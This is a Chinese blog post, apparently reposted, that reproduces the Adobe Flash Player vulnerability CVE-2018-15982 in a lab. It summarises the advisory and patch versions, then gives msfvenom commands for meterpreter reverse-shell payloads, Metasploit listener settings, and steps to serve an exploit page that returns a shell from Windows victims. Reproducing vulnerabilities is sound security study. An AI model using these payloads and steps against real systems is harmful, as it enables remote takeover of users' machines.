CVE-2018-15982漏洞復現


 

作者:歐根


 

漏洞信息:CVE-2018-15982

Adobe已發布適用於Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。這些更新解決一個  關鍵的  Adobe Flash Player的漏洞和一個  重要的  Adobe Flash Player的安裝程序的漏洞。成功利用可能導致當前用戶的上下文中的任意代碼執行和權限提升。

CVSSV3分數和漏洞類型:

受CVE-2018-15982影響的產品

產品

平台

Adobe Flash Player桌面運行時

31.0.0.153及更早版本

Windows,macOS和Linux

適用於Google Chrome的Adobe Flash Player

31.0.0.153及更早版本

Windows,macOS,Linux和Chrome OS 

適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player

31.0.0.153及更早版本

Windows 10和8.1和win7/其他版本為測試

Adobe Flash Player安裝程序

08.0.0.108及更早版本

視窗

漏洞危害:

漏洞類別

漏洞影響

嚴重

CVE編號

免費使用

任意代碼執行

危急

CVE-2018-15982 

修復方法:對adb flash進行升級

產品

平台

優先

可用性

Adobe Flash Player桌面運行時

32.0.0.101

Windows,macOS

1

Flash Player下載中心

Flash Player分發

適用於Google Chrome的Adobe Flash Player

32.0.0.101

Windows,macOS,Linux和Chrome OS 

1

谷歌Chrome發布

適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player

32.0.0.101

Windows 10和8.1

1

Microsoft安全通報

Adobe Flash Player桌面運行時

32.0.0.101

Linux的

3

Flash Player下載中心

Adobe Flash Player安裝程序

31.0.0.122

視窗

2

Flash Player下載中心

Flash Player分發


實驗環境

攻擊機:kali 2.0

受害機:win7 win10

使用工具

CVE-2018-0802_CVE-2017-11882-master exp

Msfconsole

1.創建payload程序

msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>86.bin

msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>64.bin

這里會生成兩個bin文件,分別為86bin和64bin估計是32位平台和64位平台

 

監聽payload

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp_rc4

SET LPORT 6666

set LHOST 192.168.0.111

set RC4PASSWORD zale

生成文件視頻文件和網頁

python CVE_2018_15982.py -i 86.bin -I 64.bin

調用py文件,生成攻擊網頁和視頻文件

開啟apache服務

把上面生成的網頁和視頻放在web目錄中

發給受害機驗證是否成功

當受害者點擊網頁時

可用清楚看到已經成功返回shell

至此漏洞復現結束!

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM